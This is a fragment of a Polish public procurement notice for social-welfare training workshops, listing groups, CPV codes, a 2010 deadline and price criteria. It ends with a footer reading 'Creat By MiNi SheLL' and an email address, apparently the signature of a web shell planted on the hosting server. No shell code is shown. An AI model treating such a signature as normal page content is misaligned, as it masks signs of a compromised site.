<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.52.20.00-9, 55.10.00.00-1, 55.30.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> II	Moduł:      Praca socjalna i umiejętności interpersonalne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a)	szkolenia dla przedstawicieli ROPS z zakresu umiejętności interpersonalnych oraz zapobieganiu wypaleniu zawodowemu (2 grupy po 20 osób),
b)	warsztaty dla przedstawicieli OPS, ROPS,  PCPR z zakresu pracy socjalnej z rodziną wieloproblemową (2 grupy po 20 osób),
c)	warsztaty dla kadry kierowniczej dla przedstawicieli OPS, PCPR, ROPS, DPŚ, ŚDS itp. z zakresu zarządzania jednostkami pomocy społecznej (2 grupy po 20 osób),
d)	seminaria jednodniowe nt. systemowej pomocy rodzinie oraz budowania instrumentów umożliwiających koordynację działań z zakresu polityki społecznej (2 grupy po 20 osób),
e)	szkolenie z zakresu podniesienia kompetencji wychowawczych i organizacyjnych pracowników placówek opiekuńczo - wychowawczych (1 grupa licząca 25 osób).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.52.20.00-9, 55.10.00.00-1, 55.30.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> III	Moduł:	 Szkolenia specjalistyczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a)	warsztaty szkoleniowe dla przedstawicieli OPS, PCPR, ROPS z zakresu - asystent rodzinny (1 grupa licząca 18 osób uczestnicząca w dwóch warsztatach),
b)	warsztaty szkoleniowe dla przedstawicieli OPS, PCPR, ROPS z zakresu - streetworker (1 grupa licząca 18 osób uczestnicząca w dwóch warsztatach),
c)	warsztaty szkoleniowe dla przedstawicieli OPS, PCPR, ROPS z zakresu - Konferencja Grupy Rodzinnej (1 grupa licząca 18 osób uczestnicząca w dwóch warsztatach),
d)	warsztaty szkoleniowe dla przedstawicieli OPS, PCPR, ROPS z zakresu - animator lokalny (1 grupa licząca 18 osób uczestnicząca w dwóch warsztatach)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 55.10.00.00-1, 55.30.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com